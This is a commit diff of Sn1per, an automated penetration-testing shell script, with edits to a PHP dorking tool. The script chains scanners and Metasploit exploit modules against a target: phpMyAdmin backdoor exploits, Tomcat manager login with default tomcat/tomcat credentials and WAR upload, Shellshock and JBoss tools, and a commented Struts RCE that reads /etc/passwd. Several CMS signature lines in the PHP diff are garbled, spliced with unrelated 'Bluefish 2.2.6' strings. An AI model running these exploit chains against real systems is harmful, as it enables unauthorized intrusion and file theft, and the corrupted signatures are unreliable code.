Sn1per by 1N3 @CrowdShield

This commit is contained in:
root 2016-05-01 20:41:12 -07:00
parent 932ec1431b
commit 572367eacc
4 changed files with 3902 additions and 41 deletions

View File

@ -48,6 +48,10 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
```
## CHANGELOG:
* v1.7 - Improved web scan performance
* v1.7 - Fixed issue with inurlbr output
* v1.7 - Added remote desktop viewing for RDP connections
* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
* v1.6e - Improved SMB scan performance/optimization added
* v1.6d - Improved NMap scan performance options

View File

@ -525,7 +525,7 @@ function __update() {
exit();
} else {
echo system("command clear") . __bannerLogo();
echo __bannerLogo();
echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
}
}
@ -546,7 +546,7 @@ function not_isnull_empty($valor = NULL) {
function __menu() {
return system("command clear") . __getOut(__extra() . "
return __getOut(__extra() . "
{$_SESSION["c1"]}_ _ ______ _ _____
| | | | ____| | | __ \
| |__| | |__ | | | |__) |
@ -994,7 +994,7 @@ function __menu() {
function __info() {
return system("command clear") . __getOut("
return __getOut("
{$_SESSION["c1"]}_____ _ _ ______ ____
|_ _| \ | | ____/ __ \
| | | \| | |__ | | | |
@ -1137,7 +1137,7 @@ function __bannerLogo() {
$vis = ($_SESSION["os"] != 1) ? ("\033[1;3" . rand(1, 10) . "m") : NULL;
return (!is_null($_SESSION['config']['no-banner']) ? NULL : system("command clear") . "
return (!is_null($_SESSION['config']['no-banner']) ? NULL : "
{$vis} _____ {$_SESSION["c1"]} .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. {$_SESSION["c12"]}.1BR'''Yp, .8BR'''Cq.
{$vis} (_____){$_SESSION["c1"]} 01 01N. C 01 C 01 .01. 01 {$_SESSION["c3"]} 01 Yb 01 .01.
{$vis} (() ()){$_SESSION["c1"]} 01 C YCb C 01 C 01 ,C9 01 {$_SESSION["c12"]} 01 dP 01 ,C9
@ -1290,30 +1290,26 @@ function __configExploitsADD($valor = NULL) {
function __SimpleCheckCMS($html) {
$cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="XOOPS"';
$cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Joomla!';
$cms['Wordpress CMS IDENTIFIED'] = '<meta name="generator" content="WordPress';
$cms['XOOPS CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" ';
$cms['Joomla CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" generator" content="WordPress';
$cms['SMF CMS IDENTIFIED-1'] = '<a href="http://www.simplemachines.org/" title="Simple Machines Forum" target="_blank">Powered by SMF';
$cms['SMF CMS IDENTIFIED-2'] = '<a href="http://www.simplemachines.org/about/copyright.php" title="Free Forum Software" target="_blank">SMF';
$cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="vBulletin';
$cms['vBulletin CMS IDENTIFIED-2'] = 'Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a> Version';
$cms['vBulletin CMS IDENTIFIED-1'] = '<meta name="generator" content="Bluefish 2.2.6" http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a> Version';
$cms['vBulletin CMS IDENTIFIED-3'] = 'powered by vBulletin';
$cms['phpBB CMS IDENTIFIED'] = 'Powered by <a href="http://www.phpbb.com/">phpBB</a>';
$cms['MyBB CMS IDENTIFIED'] = 'Powered By <a href="http://www.mybboard.net" target="_blank">MyBB</a>';
$cms['Drupal CMS IDENTIFIED-1'] = 'name="Generator" content="Drupal';
$cms['Drupal CMS IDENTIFIED-2'] = 'Drupal.settings';
$cms['MODx CMS IDENTIFIED'] = '<a href="http://www.modx.com" target="_blank"> Powered by MODx</a>';
$cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="SilverStripe - http://silverstripe.org" />';
$cms['SilverStripe CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" />';
$cms['Textpattern CMS IDENTIFIED'] = 'Powered by <a href="http://www.textpattern.com" title="Textpattern">Textpattern</a>';
$cms['Adapt CMS IDENTIFIED'] = 'Powered by <a href="http://www.adaptcms.com">AdaptCMS';
$cms['ATutor CMS IDENTIFIED'] = '<a href="/about.php">About ATutor</a>';
$cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="b2evolution';
$cms['Moodle CMS IDENTIFIED-1'] = 'Powered by <a href="http://moodle.org" title="Moodle">Moodle</a>';
$cms['b2evolution CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" http://moodle.org" title="Moodle">Moodle</a>';
$cms['Moodle CMS IDENTIFIED-2 '] = '<meta name="key words" content="moodle, Course Management System " />';
$cms['Moodle CMS IDENTIFIED-3'] = '://moodle';
$cms['Moodle CMS IDENTIFIED-4'] = '://www.mood le';
$cms['ATutor CMS IDENTIFIED'] = '<META NAME="GENERATOR" CONTENT="PHP-Nuke';
$cms['PostNuke CMS IDENTIFIED'] = '<meta name="generator" content="PostNuke';
$cms['ATutor CMS IDENTIFIED'] = '<meta name="generator" content="Bluefish 2.2.6" generator" content="PostNuke';
$cms['CloudFlare IDENTIFIED-1'] = '<a href="http://www.cloudflare.com/" target="_blank" style=';
$cms['CloudFlare IDENTIFIED-2'] = 'DDoS protection by CloudFlare</a>';
@ -1392,14 +1388,14 @@ function __OS() {
$sistema = strtoupper(PHP_OS);
if (substr($sistema, 0, 3) == "WIN") {
$i = 0;
system("cls");
//system("cls");
$_SESSION["os"] = 1;
while ($i <= 17) {
$_SESSION["c{$i}"] = NULL;
$i++;
}
} else {
system("command clear");
//system("command clear");
//DEFINING COLORS
$_SESSION["c0"] = "\033[0m"; // END OF COLOR
$_SESSION["c1"] = "\033[1;37m"; // WHITE

3861
bin/inurlbr.php~ Normal file

File diff suppressed because it is too large Load Diff

50
sniper
View File

@ -428,16 +428,8 @@ else
echo ""
whatweb http://$TARGET
xsstracer $TARGET 80
echo ""
if [ $SCAN_TYPE == "DOMAIN" ];
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
nmap -sV -T5 -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
echo ""
@ -484,9 +476,6 @@ else
curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Rom-0 Router Vulnerabilities on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/rom-0 | grep 200 | tail -n 10
echo ""
echo -e "$RESET"
nikto -h http://$TARGET
@ -494,6 +483,7 @@ else
if [ "$MODE" = "web" ]
then
nmap -v -sV -T5 -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET
dirb http://$TARGET
wpscan --url http://$TARGET --batch
wpscan --url http://$TARGET/wordpress/ --batch
@ -504,6 +494,14 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
GHDB="1"
fi
fi
if [ -z "$port_110" ]
@ -577,14 +575,6 @@ else
cd MassBleed
./massbleed $TARGET port 443
cd ..
nmap -sV -T5 -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET
if [ $SCAN_TYPE == "DOMAIN" ];
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt >> $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
@ -633,11 +623,13 @@ else
curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$RESET"
nikto -h https://$TARGET
cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
if [ "$MODE" = "web" ]
then
nmap -v -sV -T5 -p 443 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,tls-nextprotoneg,ssl* $TARGET
dirb https://$TARGET
wpscan --url https://$TARGET --batch
wpscan --url https://$TARGET/wordpress/ --batch
@ -648,6 +640,16 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 443 --ssl
fi
if [ $SCAN_TYPE == "DOMAIN" ]
then
if [ -z $GHDB ]
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
fi
fi
if [ -z "$port_445" ]
@ -732,6 +734,7 @@ then
else
echo -e "$OKGREEN+ -- --=[Port 3389 opened... running tests...$RESET"
nmap -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
if [ -z "$port_3632" ]
@ -800,7 +803,6 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
#arachni http://$TARGET:8000 --output-only-positives
fi
if [ -z "$port_8100" ]
@ -819,7 +821,6 @@ else
cd ..
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
#arachni http://$TARGET:8100 --output-only-positives
fi
if [ -z "$port_8080" ]
@ -839,8 +840,9 @@ else
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
nmap -p 8080 -T5 --script=*proxy* $TARGET
#arachni http://$TARGET:8080 --output-only-positives
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
python jexboss/jexboss.py http://$TARGET:8080
python jexboss/jexboss.py https://$TARGET:8080
fi
@ -862,7 +864,6 @@ else
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=loot/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
#arachni http://$TARGET:8180 --output-only-positives
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
fi
@ -883,7 +884,6 @@ else
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
nmap -p 8443 -T5 --script=*proxy* $TARGET
#arachni https://$TARGET:8443 --output-only-positives
fi
if [ -z "$port_10000" ]